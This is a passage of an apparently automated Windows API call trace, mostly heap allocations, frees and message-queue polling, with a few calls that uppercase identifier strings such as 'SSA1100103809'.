(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0104.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.241] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0104.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0104.241] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0104.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0104.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0104.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0104.242] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0104.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0104.242] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0104.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0104.243] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e48 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0104.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0104.244] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0104.244] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.244] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0104.244] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0104.244] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0104.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0104.245] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0104.245] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.245] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.245] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0104.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0104.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0104.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0104.246] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0104.246] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0104.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0104.247] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0104.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0104.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0104.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 